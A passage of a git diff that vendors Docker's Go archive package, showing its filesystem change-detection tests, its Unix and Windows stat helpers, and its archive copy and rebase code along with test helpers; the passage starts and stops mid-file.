+ if runtime.GOOS == "windows" { + t.Skip("symlinks on Windows") + } + // Mock the readonly layer + layer, err := ioutil.TempDir("", "docker-changes-test-layer") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(layer) + createSampleDir(t, layer) + os.MkdirAll(path.Join(layer, "dir1/subfolder"), 0740) + + // Mock the RW layer + rwLayer, err := ioutil.TempDir("", "docker-changes-test") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(rwLayer) + + // Create a folder in RW layer + dir1 := path.Join(rwLayer, "dir1") + os.MkdirAll(dir1, 0740) + deletedFile := path.Join(dir1, ".wh.file1-2") + ioutil.WriteFile(deletedFile, []byte{}, 0600) + modifiedFile := path.Join(dir1, "file1-1") + ioutil.WriteFile(modifiedFile, []byte{0x00}, 01444) + // Let's add a subfolder for a newFile + subfolder := path.Join(dir1, "subfolder") + os.MkdirAll(subfolder, 0740) + newFile := path.Join(subfolder, "newFile") + ioutil.WriteFile(newFile, []byte{}, 0740) + + changes, err := Changes([]string{layer}, rwLayer) + if err != nil { + t.Fatal(err) + } + + expectedChanges := []Change{ + {"/dir1", ChangeModify}, + {"/dir1/file1-1", ChangeModify}, + {"/dir1/file1-2", ChangeDelete}, + {"/dir1/subfolder", ChangeModify}, + {"/dir1/subfolder/newFile", ChangeAdd}, + } + checkChanges(expectedChanges, changes, t) +} + +// See https://github.com/docker/docker/pull/13590 +func TestChangesWithChangesGH13590(t *testing.T) { + // TODO Windows. There may be a way of running this, but turning off for now + // as createSampleDir uses symlinks. 
+ if runtime.GOOS == "windows" { + t.Skip("symlinks on Windows") + } + baseLayer, err := ioutil.TempDir("", "docker-changes-test.") + defer os.RemoveAll(baseLayer) + + dir3 := path.Join(baseLayer, "dir1/dir2/dir3") + os.MkdirAll(dir3, 07400) + + file := path.Join(dir3, "file.txt") + ioutil.WriteFile(file, []byte("hello"), 0666) + + layer, err := ioutil.TempDir("", "docker-changes-test2.") + defer os.RemoveAll(layer) + + // Test creating a new file + if err := copyDir(baseLayer+"/dir1", layer+"/"); err != nil { + t.Fatalf("Cmd failed: %q", err) + } + + os.Remove(path.Join(layer, "dir1/dir2/dir3/file.txt")) + file = path.Join(layer, "dir1/dir2/dir3/file1.txt") + ioutil.WriteFile(file, []byte("bye"), 0666) + + changes, err := Changes([]string{baseLayer}, layer) + if err != nil { + t.Fatal(err) + } + + expectedChanges := []Change{ + {"/dir1/dir2/dir3", ChangeModify}, + {"/dir1/dir2/dir3/file1.txt", ChangeAdd}, + } + checkChanges(expectedChanges, changes, t) + + // Now test changing a file + layer, err = ioutil.TempDir("", "docker-changes-test3.") + defer os.RemoveAll(layer) + + if err := copyDir(baseLayer+"/dir1", layer+"/"); err != nil { + t.Fatalf("Cmd failed: %q", err) + } + + file = path.Join(layer, "dir1/dir2/dir3/file.txt") + ioutil.WriteFile(file, []byte("bye"), 0666) + + changes, err = Changes([]string{baseLayer}, layer) + if err != nil { + t.Fatal(err) + } + + expectedChanges = []Change{ + {"/dir1/dir2/dir3/file.txt", ChangeModify}, + } + checkChanges(expectedChanges, changes, t) +} + +// Create a directory, copy it, make sure we report no changes between the two +func TestChangesDirsEmpty(t *testing.T) { + // TODO Windows. There may be a way of running this, but turning off for now + // as createSampleDir uses symlinks. 
+ // TODO Should work for Solaris + if runtime.GOOS == "windows" || runtime.GOOS == "solaris" { + t.Skip("symlinks on Windows; gcp failure on Solaris") + } + src, err := ioutil.TempDir("", "docker-changes-test") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(src) + createSampleDir(t, src) + dst := src + "-copy" + if err := copyDir(src, dst); err != nil { + t.Fatal(err) + } + defer os.RemoveAll(dst) + changes, err := ChangesDirs(dst, src) + if err != nil { + t.Fatal(err) + } + + if len(changes) != 0 { + t.Fatalf("Reported changes for identical dirs: %v", changes) + } + os.RemoveAll(src) + os.RemoveAll(dst) +} + +func mutateSampleDir(t *testing.T, root string) { + // Remove a regular file + if err := os.RemoveAll(path.Join(root, "file1")); err != nil { + t.Fatal(err) + } + + // Remove a directory + if err := os.RemoveAll(path.Join(root, "dir1")); err != nil { + t.Fatal(err) + } + + // Remove a symlink + if err := os.RemoveAll(path.Join(root, "symlink1")); err != nil { + t.Fatal(err) + } + + // Rewrite a file + if err := ioutil.WriteFile(path.Join(root, "file2"), []byte("fileNN\n"), 0777); err != nil { + t.Fatal(err) + } + + // Replace a file + if err := os.RemoveAll(path.Join(root, "file3")); err != nil { + t.Fatal(err) + } + if err := ioutil.WriteFile(path.Join(root, "file3"), []byte("fileMM\n"), 0404); err != nil { + t.Fatal(err) + } + + // Touch file + if err := system.Chtimes(path.Join(root, "file4"), time.Now().Add(time.Second), time.Now().Add(time.Second)); err != nil { + t.Fatal(err) + } + + // Replace file with dir + if err := os.RemoveAll(path.Join(root, "file5")); err != nil { + t.Fatal(err) + } + if err := os.MkdirAll(path.Join(root, "file5"), 0666); err != nil { + t.Fatal(err) + } + + // Create new file + if err := ioutil.WriteFile(path.Join(root, "filenew"), []byte("filenew\n"), 0777); err != nil { + t.Fatal(err) + } + + // Create new dir + if err := os.MkdirAll(path.Join(root, "dirnew"), 0766); err != nil { + t.Fatal(err) + } + + // Create a 
new symlink + if err := os.Symlink("targetnew", path.Join(root, "symlinknew")); err != nil { + t.Fatal(err) + } + + // Change a symlink + if err := os.RemoveAll(path.Join(root, "symlink2")); err != nil { + t.Fatal(err) + } + if err := os.Symlink("target2change", path.Join(root, "symlink2")); err != nil { + t.Fatal(err) + } + + // Replace dir with file + if err := os.RemoveAll(path.Join(root, "dir2")); err != nil { + t.Fatal(err) + } + if err := ioutil.WriteFile(path.Join(root, "dir2"), []byte("dir2\n"), 0777); err != nil { + t.Fatal(err) + } + + // Touch dir + if err := system.Chtimes(path.Join(root, "dir3"), time.Now().Add(time.Second), time.Now().Add(time.Second)); err != nil { + t.Fatal(err) + } +} + +func TestChangesDirsMutated(t *testing.T) { + // TODO Windows. There may be a way of running this, but turning off for now + // as createSampleDir uses symlinks. + // TODO Should work for Solaris + if runtime.GOOS == "windows" || runtime.GOOS == "solaris" { + t.Skip("symlinks on Windows; gcp failures on Solaris") + } + src, err := ioutil.TempDir("", "docker-changes-test") + if err != nil { + t.Fatal(err) + } + createSampleDir(t, src) + dst := src + "-copy" + if err := copyDir(src, dst); err != nil { + t.Fatal(err) + } + defer os.RemoveAll(src) + defer os.RemoveAll(dst) + + mutateSampleDir(t, dst) + + changes, err := ChangesDirs(dst, src) + if err != nil { + t.Fatal(err) + } + + sort.Sort(changesByPath(changes)) + + expectedChanges := []Change{ + {"/dir1", ChangeDelete}, + {"/dir2", ChangeModify}, + {"/dirnew", ChangeAdd}, + {"/file1", ChangeDelete}, + {"/file2", ChangeModify}, + {"/file3", ChangeModify}, + {"/file4", ChangeModify}, + {"/file5", ChangeModify}, + {"/filenew", ChangeAdd}, + {"/symlink1", ChangeDelete}, + {"/symlink2", ChangeModify}, + {"/symlinknew", ChangeAdd}, + } + + for i := 0; i < max(len(changes), len(expectedChanges)); i++ { + if i >= len(expectedChanges) { + t.Fatalf("unexpected change %s\n", changes[i].String()) + } + if i >= len(changes) { + 
t.Fatalf("no change for expected change %s\n", expectedChanges[i].String()) + } + if changes[i].Path == expectedChanges[i].Path { + if changes[i] != expectedChanges[i] { + t.Fatalf("Wrong change for %s, expected %s, got %s\n", changes[i].Path, changes[i].String(), expectedChanges[i].String()) + } + } else if changes[i].Path < expectedChanges[i].Path { + t.Fatalf("unexpected change %s\n", changes[i].String()) + } else { + t.Fatalf("no change for expected change %s != %s\n", expectedChanges[i].String(), changes[i].String()) + } + } +} + +func TestApplyLayer(t *testing.T) { + // TODO Windows. There may be a way of running this, but turning off for now + // as createSampleDir uses symlinks. + // TODO Should work for Solaris + if runtime.GOOS == "windows" || runtime.GOOS == "solaris" { + t.Skip("symlinks on Windows; gcp failures on Solaris") + } + src, err := ioutil.TempDir("", "docker-changes-test") + if err != nil { + t.Fatal(err) + } + createSampleDir(t, src) + defer os.RemoveAll(src) + dst := src + "-copy" + if err := copyDir(src, dst); err != nil { + t.Fatal(err) + } + mutateSampleDir(t, dst) + defer os.RemoveAll(dst) + + changes, err := ChangesDirs(dst, src) + if err != nil { + t.Fatal(err) + } + + layer, err := ExportChanges(dst, changes, nil, nil) + if err != nil { + t.Fatal(err) + } + + layerCopy, err := NewTempArchive(layer, "") + if err != nil { + t.Fatal(err) + } + + if _, err := ApplyLayer(src, layerCopy); err != nil { + t.Fatal(err) + } + + changes2, err := ChangesDirs(src, dst) + if err != nil { + t.Fatal(err) + } + + if len(changes2) != 0 { + t.Fatalf("Unexpected differences after reapplying mutation: %v", changes2) + } +} + +func TestChangesSizeWithHardlinks(t *testing.T) { + // TODO Windows. There may be a way of running this, but turning off for now + // as createSampleDir uses symlinks. 
+ if runtime.GOOS == "windows" { + t.Skip("hardlinks on Windows") + } + srcDir, err := ioutil.TempDir("", "docker-test-srcDir") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(srcDir) + + destDir, err := ioutil.TempDir("", "docker-test-destDir") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(destDir) + + creationSize, err := prepareUntarSourceDirectory(100, destDir, true) + if err != nil { + t.Fatal(err) + } + + changes, err := ChangesDirs(destDir, srcDir) + if err != nil { + t.Fatal(err) + } + + got := ChangesSize(destDir, changes) + if got != int64(creationSize) { + t.Errorf("Expected %d bytes of changes, got %d", creationSize, got) + } +} + +func TestChangesSizeWithNoChanges(t *testing.T) { + size := ChangesSize("/tmp", nil) + if size != 0 { + t.Fatalf("ChangesSizes with no changes should be 0, was %d", size) + } +} + +func TestChangesSizeWithOnlyDeleteChanges(t *testing.T) { + changes := []Change{ + {Path: "deletedPath", Kind: ChangeDelete}, + } + size := ChangesSize("/tmp", changes) + if size != 0 { + t.Fatalf("ChangesSizes with only delete changes should be 0, was %d", size) + } +} + +func TestChangesSize(t *testing.T) { + parentPath, err := ioutil.TempDir("", "docker-changes-test") + defer os.RemoveAll(parentPath) + addition := path.Join(parentPath, "addition") + if err := ioutil.WriteFile(addition, []byte{0x01, 0x01, 0x01}, 0744); err != nil { + t.Fatal(err) + } + modification := path.Join(parentPath, "modification") + if err = ioutil.WriteFile(modification, []byte{0x01, 0x01, 0x01}, 0744); err != nil { + t.Fatal(err) + } + changes := []Change{ + {Path: "addition", Kind: ChangeAdd}, + {Path: "modification", Kind: ChangeModify}, + } + size := ChangesSize(parentPath, changes) + if size != 6 { + t.Fatalf("Expected 6 bytes of changes, got %d", size) + } +} + +func checkChanges(expectedChanges, changes []Change, t *testing.T) { + sort.Sort(changesByPath(expectedChanges)) + sort.Sort(changesByPath(changes)) + for i := 0; i < max(len(changes), 
len(expectedChanges)); i++ { + if i >= len(expectedChanges) { + t.Fatalf("unexpected change %s\n", changes[i].String()) + } + if i >= len(changes) { + t.Fatalf("no change for expected change %s\n", expectedChanges[i].String()) + } + if changes[i].Path == expectedChanges[i].Path { + if changes[i] != expectedChanges[i] { + t.Fatalf("Wrong change for %s, expected %s, got %s\n", changes[i].Path, changes[i].String(), expectedChanges[i].String()) + } + } else if changes[i].Path < expectedChanges[i].Path { + t.Fatalf("unexpected change %s\n", changes[i].String()) + } else { + t.Fatalf("no change for expected change %s != %s\n", expectedChanges[i].String(), changes[i].String()) + } + } +} diff --git a/vendor/github.com/docker/docker/pkg/archive/changes_unix.go b/vendor/github.com/docker/docker/pkg/archive/changes_unix.go new file mode 100644 index 0000000000..3778b732cf --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/archive/changes_unix.go @@ -0,0 +1,36 @@ +// +build !windows + +package archive + +import ( + "os" + "syscall" + + "github.com/docker/docker/pkg/system" +) + +func statDifferent(oldStat *system.StatT, newStat *system.StatT) bool { + // Don't look at size for dirs, its not a good measure of change + if oldStat.Mode() != newStat.Mode() || + oldStat.UID() != newStat.UID() || + oldStat.GID() != newStat.GID() || + oldStat.Rdev() != newStat.Rdev() || + // Don't look at size for dirs, its not a good measure of change + (oldStat.Mode()&syscall.S_IFDIR != syscall.S_IFDIR && + (!sameFsTimeSpec(oldStat.Mtim(), newStat.Mtim()) || (oldStat.Size() != newStat.Size()))) { + return true + } + return false +} + +func (info *FileInfo) isDir() bool { + return info.parent == nil || info.stat.Mode()&syscall.S_IFDIR != 0 +} + +func getIno(fi os.FileInfo) uint64 { + return uint64(fi.Sys().(*syscall.Stat_t).Ino) +} + +func hasHardlinks(fi os.FileInfo) bool { + return fi.Sys().(*syscall.Stat_t).Nlink > 1 +} diff --git 
// statDifferent reports whether two stat results differ in a way that
// counts as a filesystem change on Windows: a different modification
// time, a different mode, or — for non-directories — a different size.
func statDifferent(oldStat *system.StatT, newStat *system.StatT) bool {

	// Don't look at size for dirs, it's not a good measure of change
	if oldStat.ModTime() != newStat.ModTime() ||
		oldStat.Mode() != newStat.Mode() ||
		oldStat.Size() != newStat.Size() && !oldStat.IsDir() {
		return true
	}
	return false
}

// isDir reports whether info describes a directory. The root FileInfo
// (parent == nil) is always treated as a directory.
func (info *FileInfo) isDir() bool {
	return info.parent == nil || info.stat.IsDir()
}

// getIno always returns 0 on Windows; inode numbers are a Unix concept.
func getIno(fi os.FileInfo) (inode uint64) {
	return
}

// hasHardlinks always reports false on Windows; hard-link detection is
// only implemented for Unix.
func hasHardlinks(fi os.FileInfo) bool {
	return false
}

// Errors used or returned by this file.
var (
	// ErrNotDirectory is returned when a destination's parent exists but
	// is not a directory.
	ErrNotDirectory = errors.New("not a directory")
	// ErrDirNotExists is returned when the destination is asserted to be
	// a directory but does not exist.
	ErrDirNotExists = errors.New("no such directory")
	// ErrCannotCopyDir is returned when a directory source would
	// overwrite an existing non-directory destination.
	ErrCannotCopyDir = errors.New("cannot copy directory")
	// ErrInvalidCopySource marks unusable copy source content.
	ErrInvalidCopySource = errors.New("invalid copy source content")
)
If the cleaned +// path already ends in a `.` path segment, then another is not added. If the +// clean path already ends in a path separator, then another is not added. +func PreserveTrailingDotOrSeparator(cleanedPath, originalPath string) string { + // Ensure paths are in platform semantics + cleanedPath = normalizePath(cleanedPath) + originalPath = normalizePath(originalPath) + + if !specifiesCurrentDir(cleanedPath) && specifiesCurrentDir(originalPath) { + if !hasTrailingPathSeparator(cleanedPath) { + // Add a separator if it doesn't already end with one (a cleaned + // path would only end in a separator if it is the root). + cleanedPath += string(filepath.Separator) + } + cleanedPath += "." + } + + if !hasTrailingPathSeparator(cleanedPath) && hasTrailingPathSeparator(originalPath) { + cleanedPath += string(filepath.Separator) + } + + return cleanedPath +} + +// assertsDirectory returns whether the given path is +// asserted to be a directory, i.e., the path ends with +// a trailing '/' or `/.`, assuming a path separator of `/`. +func assertsDirectory(path string) bool { + return hasTrailingPathSeparator(path) || specifiesCurrentDir(path) +} + +// hasTrailingPathSeparator returns whether the given +// path ends with the system's path separator character. +func hasTrailingPathSeparator(path string) bool { + return len(path) > 0 && os.IsPathSeparator(path[len(path)-1]) +} + +// specifiesCurrentDir returns whether the given path specifies +// a "current directory", i.e., the last path segment is `.`. +func specifiesCurrentDir(path string) bool { + return filepath.Base(path) == "." +} + +// SplitPathDirEntry splits the given path between its directory name and its +// basename by first cleaning the path but preserves a trailing "." if the +// original path specified the current directory. 
+func SplitPathDirEntry(path string) (dir, base string) { + cleanedPath := filepath.Clean(normalizePath(path)) + + if specifiesCurrentDir(path) { + cleanedPath += string(filepath.Separator) + "." + } + + return filepath.Dir(cleanedPath), filepath.Base(cleanedPath) +} + +// TarResource archives the resource described by the given CopyInfo to a Tar +// archive. A non-nil error is returned if sourcePath does not exist or is +// asserted to be a directory but exists as another type of file. +// +// This function acts as a convenient wrapper around TarWithOptions, which +// requires a directory as the source path. TarResource accepts either a +// directory or a file path and correctly sets the Tar options. +func TarResource(sourceInfo CopyInfo) (content io.ReadCloser, err error) { + return TarResourceRebase(sourceInfo.Path, sourceInfo.RebaseName) +} + +// TarResourceRebase is like TarResource but renames the first path element of +// items in the resulting tar archive to match the given rebaseName if not "". +func TarResourceRebase(sourcePath, rebaseName string) (content io.ReadCloser, err error) { + sourcePath = normalizePath(sourcePath) + if _, err = os.Lstat(sourcePath); err != nil { + // Catches the case where the source does not exist or is not a + // directory if asserted to be a directory, as this also causes an + // error. + return + } + + // Separate the source path between its directory and + // the entry in that directory which we are archiving. + sourceDir, sourceBase := SplitPathDirEntry(sourcePath) + + filter := []string{sourceBase} + + logrus.Debugf("copying %q from %q", sourceBase, sourceDir) + + return TarWithOptions(sourceDir, &TarOptions{ + Compression: Uncompressed, + IncludeFiles: filter, + IncludeSourceDir: true, + RebaseNames: map[string]string{ + sourceBase: rebaseName, + }, + }) +} + +// CopyInfo holds basic info about the source +// or destination path of a copy operation. 
// CopyInfo holds basic info about the source
// or destination path of a copy operation.
type CopyInfo struct {
	Path       string // absolute local path of the resource
	Exists     bool   // whether the path currently exists
	IsDir      bool   // whether the path is a directory
	RebaseName string // replacement first path element for archive entries, if any
}

// CopyInfoSourcePath stats the given path to create a CopyInfo
// struct representing that resource for the source of an archive copy
// operation. The given path should be an absolute local path. A source path
// has all symlinks evaluated that appear before the last path separator ("/"
// on Unix). As it is to be a copy source, the path must exist.
func CopyInfoSourcePath(path string, followLink bool) (CopyInfo, error) {
	// normalize the file path and then evaluate the symbol link
	// we will use the target file instead of the symbol link if
	// followLink is set
	path = normalizePath(path)

	resolvedPath, rebaseName, err := ResolveHostSourcePath(path, followLink)
	if err != nil {
		return CopyInfo{}, err
	}

	// Lstat (not Stat) so a symlink as the final element is described
	// as the link itself when followLink is false.
	stat, err := os.Lstat(resolvedPath)
	if err != nil {
		return CopyInfo{}, err
	}

	return CopyInfo{
		Path:       resolvedPath,
		Exists:     true,
		IsDir:      stat.IsDir(),
		RebaseName: rebaseName,
	}, nil
}

// CopyInfoDestinationPath stats the given path to create a CopyInfo
// struct representing that resource for the destination of an archive copy
// operation. The given path should be an absolute local path.
//
// Unlike CopyInfoSourcePath, symlinks in the final path element are
// followed (up to maxSymlinkIter hops) so that the copy targets the
// link's destination rather than the link itself. A missing final
// element is not an error as long as its parent directory exists.
func CopyInfoDestinationPath(path string) (info CopyInfo, err error) {
	maxSymlinkIter := 10 // filepath.EvalSymlinks uses 255, but 10 already seems like a lot.
	path = normalizePath(path)
	originalPath := path

	stat, err := os.Lstat(path)

	if err == nil && stat.Mode()&os.ModeSymlink == 0 {
		// The path exists and is not a symlink.
		return CopyInfo{
			Path:   path,
			Exists: true,
			IsDir:  stat.IsDir(),
		}, nil
	}

	// While the path is a symlink.
	for n := 0; err == nil && stat.Mode()&os.ModeSymlink != 0; n++ {
		if n > maxSymlinkIter {
			// Don't follow symlinks more than this arbitrary number of times.
			return CopyInfo{}, errors.New("too many symlinks in " + originalPath)
		}

		// The path is a symbolic link. We need to evaluate it so that the
		// destination of the copy operation is the link target and not the
		// link itself. This is notably different than CopyInfoSourcePath which
		// only evaluates symlinks before the last appearing path separator.
		// Also note that it is okay if the last path element is a broken
		// symlink as the copy operation should create the target.
		var linkTarget string

		linkTarget, err = os.Readlink(path)
		if err != nil {
			return CopyInfo{}, err
		}

		if !system.IsAbs(linkTarget) {
			// Join with the parent directory.
			dstParent, _ := SplitPathDirEntry(path)
			linkTarget = filepath.Join(dstParent, linkTarget)
		}

		path = linkTarget
		stat, err = os.Lstat(path)
	}

	if err != nil {
		// It's okay if the destination path doesn't exist. We can still
		// continue the copy operation if the parent directory exists.
		if !os.IsNotExist(err) {
			return CopyInfo{}, err
		}

		// Ensure destination parent dir exists.
		dstParent, _ := SplitPathDirEntry(path)

		// NOTE: this := deliberately shadows the outer err; the outer one
		// still records that the destination itself does not exist.
		parentDirStat, err := os.Lstat(dstParent)
		if err != nil {
			return CopyInfo{}, err
		}
		if !parentDirStat.IsDir() {
			return CopyInfo{}, ErrNotDirectory
		}

		return CopyInfo{Path: path}, nil
	}

	// The path exists after resolving symlinks.
	return CopyInfo{
		Path:   path,
		Exists: true,
		IsDir:  stat.IsDir(),
	}, nil
}

// PrepareArchiveCopy prepares the given srcContent archive, which should
// contain the archived resource described by srcInfo, to the destination
// described by dstInfo. Returns the possibly modified content archive along
// with the path to the destination directory which it should be extracted to.
func PrepareArchiveCopy(srcContent io.Reader, srcInfo, dstInfo CopyInfo) (dstDir string, content io.ReadCloser, err error) {
	// Ensure in platform semantics
	srcInfo.Path = normalizePath(srcInfo.Path)
	dstInfo.Path = normalizePath(dstInfo.Path)

	// Separate the destination path between its directory and base
	// components in case the source archive contents need to be rebased.
	dstDir, dstBase := SplitPathDirEntry(dstInfo.Path)
	_, srcBase := SplitPathDirEntry(srcInfo.Path)

	switch {
	case dstInfo.Exists && dstInfo.IsDir:
		// The destination exists as a directory. No alteration
		// to srcContent is needed as its contents can be
		// simply extracted to the destination directory.
		return dstInfo.Path, ioutil.NopCloser(srcContent), nil
	case dstInfo.Exists && srcInfo.IsDir:
		// The destination exists as some type of file and the source
		// content is a directory. This is an error condition since
		// you cannot copy a directory to an existing file location.
		return "", nil, ErrCannotCopyDir
	case dstInfo.Exists:
		// The destination exists as some type of file and the source content
		// is also a file. The source content entry will have to be renamed to
		// have a basename which matches the destination path's basename.
		if len(srcInfo.RebaseName) != 0 {
			srcBase = srcInfo.RebaseName
		}
		return dstDir, RebaseArchiveEntries(srcContent, srcBase, dstBase), nil
	case srcInfo.IsDir:
		// The destination does not exist and the source content is an archive
		// of a directory. The archive should be extracted to the parent of
		// the destination path instead, and when it is, the directory that is
		// created as a result should take the name of the destination path.
		// The source content entries will have to be renamed to have a
		// basename which matches the destination path's basename.
		if len(srcInfo.RebaseName) != 0 {
			srcBase = srcInfo.RebaseName
		}
		return dstDir, RebaseArchiveEntries(srcContent, srcBase, dstBase), nil
	case assertsDirectory(dstInfo.Path):
		// The destination does not exist and is asserted to be created as a
		// directory, but the source content is not a directory. This is an
		// error condition since you cannot create a directory from a file
		// source.
		return "", nil, ErrDirNotExists
	default:
		// The last remaining case is when the destination does not exist, is
		// not asserted to be a directory, and the source content is not an
		// archive of a directory. In this case, the destination file will need
		// to be created when the archive is extracted and the source content
		// entry will have to be renamed to have a basename which matches the
		// destination path's basename.
		if len(srcInfo.RebaseName) != 0 {
			srcBase = srcInfo.RebaseName
		}
		return dstDir, RebaseArchiveEntries(srcContent, srcBase, dstBase), nil
	}

}

// RebaseArchiveEntries rewrites the given srcContent archive replacing
// an occurrence of oldBase with newBase at the beginning of entry names.
// The rewriting happens in a background goroutine streaming through an
// io.Pipe, so errors surface on the returned reader.
func RebaseArchiveEntries(srcContent io.Reader, oldBase, newBase string) io.ReadCloser {
	if oldBase == string(os.PathSeparator) {
		// If oldBase specifies the root directory, use an empty string as
		// oldBase instead so that newBase doesn't replace the path separator
		// that all paths will start with.
		oldBase = ""
	}

	rebased, w := io.Pipe()

	go func() {
		srcTar := tar.NewReader(srcContent)
		rebasedTar := tar.NewWriter(w)

		for {
			hdr, err := srcTar.Next()
			if err == io.EOF {
				// Signals end of archive.
				rebasedTar.Close()
				w.Close()
				return
			}
			if err != nil {
				w.CloseWithError(err)
				return
			}

			// Only the first occurrence is replaced, i.e. the leading
			// path element.
			hdr.Name = strings.Replace(hdr.Name, oldBase, newBase, 1)

			if err = rebasedTar.WriteHeader(hdr); err != nil {
				w.CloseWithError(err)
				return
			}

			if _, err = io.Copy(rebasedTar, srcTar); err != nil {
				w.CloseWithError(err)
				return
			}
		}
	}()

	return rebased
}

// CopyResource performs an archive copy from the given source path to the
// given destination path. The source path MUST exist and the destination
// path's parent directory must exist.
func CopyResource(srcPath, dstPath string, followLink bool) error {
	var (
		srcInfo CopyInfo
		err     error
	)

	// Ensure in platform semantics
	srcPath = normalizePath(srcPath)
	dstPath = normalizePath(dstPath)

	// Clean the source and destination paths.
	srcPath = PreserveTrailingDotOrSeparator(filepath.Clean(srcPath), srcPath)
	dstPath = PreserveTrailingDotOrSeparator(filepath.Clean(dstPath), dstPath)

	if srcInfo, err = CopyInfoSourcePath(srcPath, followLink); err != nil {
		return err
	}

	content, err := TarResource(srcInfo)
	if err != nil {
		return err
	}
	defer content.Close()

	return CopyTo(content, srcInfo, dstPath)
}

// CopyTo handles extracting the given content whose
// entries should be sourced from srcInfo to dstPath.
func CopyTo(content io.Reader, srcInfo CopyInfo, dstPath string) error {
	// The destination path need not exist, but CopyInfoDestinationPath will
	// ensure that at least the parent directory exists.
	dstInfo, err := CopyInfoDestinationPath(normalizePath(dstPath))
	if err != nil {
		return err
	}

	dstDir, copyArchive, err := PrepareArchiveCopy(content, srcInfo, dstInfo)
	if err != nil {
		return err
	}
	defer copyArchive.Close()

	options := &TarOptions{
		NoLchown:             true,
		NoOverwriteDirNonDir: true,
	}

	return Untar(copyArchive, dstDir, options)
}

// ResolveHostSourcePath decides real path need to be copied with parameters such as
// whether to follow symbol link or not, if followLink is true, resolvedPath will return
// link target of any symbol link file, else it will only resolve symlink of directory
// but return symbol link file itself without resolving.
func ResolveHostSourcePath(path string, followLink bool) (resolvedPath, rebaseName string, err error) {
	if followLink {
		resolvedPath, err = filepath.EvalSymlinks(path)
		if err != nil {
			return
		}

		resolvedPath, rebaseName = GetRebaseName(path, resolvedPath)
	} else {
		dirPath, basePath := filepath.Split(path)

		// if not follow symbol link, then resolve symbol link of parent dir
		var resolvedDirPath string
		resolvedDirPath, err = filepath.EvalSymlinks(dirPath)
		if err != nil {
			return
		}
		// resolvedDirPath will have been cleaned (no trailing path separators) so
		// we can manually join it with the base path element.
		resolvedPath = resolvedDirPath + string(filepath.Separator) + basePath
		if hasTrailingPathSeparator(path) && filepath.Base(path) != filepath.Base(resolvedPath) {
			rebaseName = filepath.Base(path)
		}
	}
	return resolvedPath, rebaseName, nil
}

// GetRebaseName normalizes and compares path and resolvedPath,
// return completed resolved path and rebased file name
func GetRebaseName(path, resolvedPath string) (string, string) {
	// linkTarget will have been cleaned (no trailing path separators and dot) so
	// we can manually join it with them
	var rebaseName string
	if specifiesCurrentDir(path) && !specifiesCurrentDir(resolvedPath) {
		resolvedPath += string(filepath.Separator) + "."
	}

	if hasTrailingPathSeparator(path) && !hasTrailingPathSeparator(resolvedPath) {
		resolvedPath += string(filepath.Separator)
	}

	if filepath.Base(path) != filepath.Base(resolvedPath) {
		// In the case where the path had a trailing separator and a symlink
		// evaluation has changed the last path component, we will need to
		// rebase the name in the archive that is being copied to match the
		// originally requested name.
		rebaseName = filepath.Base(path)
	}
	return resolvedPath, rebaseName
}

// normalizePath converts path to this platform's semantics; on Unix it
// maps to filepath.ToSlash.
func normalizePath(path string) string {
	return filepath.ToSlash(path)
}

// TODO Windows: Some of these tests may be salvageable and portable to Windows.

// removeAllPaths removes every given path, ignoring errors (test cleanup helper).
func removeAllPaths(paths ...string) {
	for _, path := range paths {
		os.RemoveAll(path)
	}
}

// getTestTempDirs creates two fresh temp directories for a copy test,
// failing the test if either cannot be created.
func getTestTempDirs(t *testing.T) (tmpDirA, tmpDirB string) {
	var err error

	if tmpDirA, err = ioutil.TempDir("", "archive-copy-test"); err != nil {
		t.Fatal(err)
	}

	if tmpDirB, err = ioutil.TempDir("", "archive-copy-test"); err != nil {
		t.Fatal(err)
	}

	return
}

// isNotDir reports whether err looks like an ENOTDIR-style error, by
// matching the error text.
func isNotDir(err error) bool {
	return strings.Contains(err.Error(), "not a directory")
}
+ + return fmt.Sprintf("%s%c", joined, filepath.Separator) +} + +func fileContentsEqual(t *testing.T, filenameA, filenameB string) (err error) { + t.Logf("checking for equal file contents: %q and %q\n", filenameA, filenameB) + + fileA, err := os.Open(filenameA) + if err != nil { + return + } + defer fileA.Close() + + fileB, err := os.Open(filenameB) + if err != nil { + return + } + defer fileB.Close() + + hasher := sha256.New() + + if _, err = io.Copy(hasher, fileA); err != nil { + return + } + + hashA := hasher.Sum(nil) + hasher.Reset() + + if _, err = io.Copy(hasher, fileB); err != nil { + return + } + + hashB := hasher.Sum(nil) + + if !bytes.Equal(hashA, hashB) { + err = fmt.Errorf("file content hashes not equal - expected %s, got %s", hex.EncodeToString(hashA), hex.EncodeToString(hashB)) + } + + return +} + +func dirContentsEqual(t *testing.T, newDir, oldDir string) (err error) { + t.Logf("checking for equal directory contents: %q and %q\n", newDir, oldDir) + + var changes []Change + + if changes, err = ChangesDirs(newDir, oldDir); err != nil { + return + } + + if len(changes) != 0 { + err = fmt.Errorf("expected no changes between directories, but got: %v", changes) + } + + return +} + +func logDirContents(t *testing.T, dirPath string) { + logWalkedPaths := filepath.WalkFunc(func(path string, info os.FileInfo, err error) error { + if err != nil { + t.Errorf("stat error for path %q: %s", path, err) + return nil + } + + if info.IsDir() { + path = joinTrailingSep(path) + } + + t.Logf("\t%s", path) + + return nil + }) + + t.Logf("logging directory contents: %q", dirPath) + + if err := filepath.Walk(dirPath, logWalkedPaths); err != nil { + t.Fatal(err) + } +} + +func testCopyHelper(t *testing.T, srcPath, dstPath string) (err error) { + t.Logf("copying from %q to %q (not follow symbol link)", srcPath, dstPath) + + return CopyResource(srcPath, dstPath, false) +} + +func testCopyHelperFSym(t *testing.T, srcPath, dstPath string) (err error) { + t.Logf("copying from %q 
